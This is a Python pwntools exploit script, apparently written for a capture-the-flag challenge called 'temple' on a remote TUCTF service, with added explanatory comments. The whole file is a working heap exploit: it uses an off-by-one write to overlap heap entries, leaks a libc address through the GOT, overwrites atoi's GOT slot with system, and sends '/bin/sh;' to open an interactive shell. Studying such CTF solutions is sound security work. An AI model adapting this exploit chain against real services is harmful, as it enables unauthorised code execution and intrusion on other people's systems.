from pwn import *
# CANARY : ENABLED
# FORTIFY : disabled
# NX : ENABLED
# PIE : disabled
# RELRO : Partial
# 0x603188 <templeWisdom>: 0x8 ; number of wisdoms
# 0x6031a0 <temple>: 0x0 0x625040 ; temple
# your scribes start at idx 8
# Target selection: set `local` to True to drive a local copy of the binary
# instead of the remote CTF service. `r` is the pwntools tube used by every
# helper below.
local = False
if not local:
    #r = remote("guestbook.tuctf.com", 4545)
    r = remote("temple.tuctf.com", 4343)
else:
    r = process("./temple")
    # Debugger hooks kept from the original, disabled:
    #context.terminal = [ "tmux", "splitw" ]
    #gdb.attach(r, """
    # b *0x000000000040167D
    # c
    #""")
def take(idx):
    """Menu option 1 ("take"): select the wisdom stored at entry *idx*.

    Waits for the menu prompt, picks option 1, then answers the index
    prompt. Talks over the module-level tube ``r``. The calling script
    uses this both to release an entry and to have its text printed.
    """
    exchange = (
        ("Your choice: ", "1"),
        ("seek?: ", str(idx)),
    )
    for prompt, reply in exchange:
        r.recvuntil(prompt)
        r.sendline(reply)
def give(size, data):
    """Menu option 2 ("give"): create a new wisdom of *size* bytes.

    *data* is delivered with ``send`` rather than ``sendline`` so the caller
    controls the exact bytes (and whether a newline is included). Talks over
    the module-level tube ``r``.
    """
    for prompt, reply in (("Your choice: ", "2"), ("hold?: ", str(size))):
        r.recvuntil(prompt)
        r.sendline(reply)
    r.recvuntil("wisdom?: ")
    r.send(data)
def modify(idx, data):
    """Menu option 3 ("modify"): overwrite the text of entry *idx* with *data*.

    *data* goes out via ``send`` (no newline appended), so the exact byte
    count written is the caller's responsibility. Talks over the
    module-level tube ``r``.
    """
    for prompt, reply in (("Your choice: ", "3"), ("rethink?: ", str(idx))):
        r.recvuntil(prompt)
        r.sendline(reply)
    r.recvuntil("differently?: ")
    r.send(data)
# ---- Stage 1: leak a libc pointer through an overlapping heap entry ----
# Entries are numbered from 8 (see the header note), so these become 8, 9, 10.
give(32, "A"*31 + "\n")
give(32, "B"*31 + "\n")
give(32, "C"*31 + "\n")
# clear in-use bit of first chunk
# 33 bytes into an entry created with size 32: the service evidently accepts
# one byte more than the requested size, and that byte lands on the adjacent
# heap chunk's metadata (per the author's note, its in-use bit). This
# off-by-one write is the root defect the rest of the script relies on.
modify(8, "A"*32 + "\x30")
# free chunk 2 to coalesce with first chunk
take(9)
# The new entry (11) is carved out of the coalesced region, so its record
# overlaps the text of entry 8 (author's comment below).
give(32, "D"*31 + "\n")
# 11 and text of 8 overlaps
# Rewrites entry 11's record through entry 8's text. The payload looks like
# two (size, pointer) pairs, the second pointing entry 11's text at
# 0x603018 — presumably a GOT slot of this non-PIE binary (cf. atoi_got =
# 0x603098 below) — TODO confirm against the binary.
modify(8, p64(8) + p64(0x0) + p64(8) + p64(0x603018) + "\n")
# Printing entry 11 now dumps whatever lives at 0x603018.
take(11)
r.recvuntil(" - ")
# Collect exactly 6 bytes (a canonical 64-bit user-space pointer) and
# zero-pad to 8 before unpacking.
leak = bytearray()
while len(leak) != 6:
    leak.append(r.recv(1))
leak = u64(leak.ljust(8, "\x00"))
# Offsets below are specific to the remote libc build; the commented value
# is an alternative the author tried.
#libc_base = leak - 0x68f90
libc_base = leak - 0x000000000006b990
log.success("leak: 0x{:012x}".format(leak))
log.success("libc base: 0x{:012x}".format(libc_base))
# NOTE(review): three assignments in a row — only the last takes effect; the
# first two are dead code left from trying different libc versions.
system = libc_base + 0x000000000003f480
system = libc_base + 0x0003e3e0
system = libc_base + 0x0000000000041490
log.success("system: 0x{:012x}".format(system))
#bin_sh = libc_base + 0x1619b9
#log.success("/bin/sh: 0x{:012x}".format(bin_sh))
# ---- Stage 2: repeat the overlap to obtain a write into the GOT ----
give(32, "A"*31 + "\n") # 12
give(32, "B"*31 + "\n") # 13
give(32, "C"*31 + "\n") # 14
give(32, "D"*31 + "\n") # 15
give(32, "E"*31 + "\n") # 16
give(32, "F"*31 + "\n") # 17
# clear in-use bit of first chunk
# Same one-byte overflow as in stage 1, this time from entry 14.
modify(14, "A"*32 + "\x30")
# free chunk 2 to coalesce with first chunk
take(15)
give(32, "G"*31 + "\n") # 18, overlapping the text of 14
atoi_got = 0x603098
# 18 and text of 14 overlaps
# Point entry 18's text at atoi's GOT slot ...
modify(14, p64(8) + p64(atoi_got) + p64(8) + p64(0x603018) + "\n")
# ... and write system's address into it. This only works because RELRO is
# Partial (header note): with Full RELRO the GOT is read-only after loading
# and this write would fault.
modify(18, p64(system))
#take(15)
# Presumably the menu parses its choice with atoi, which now resolves to
# system, so the next line of input is run as a shell command.
r.sendline("/bin/sh;")
r.interactive()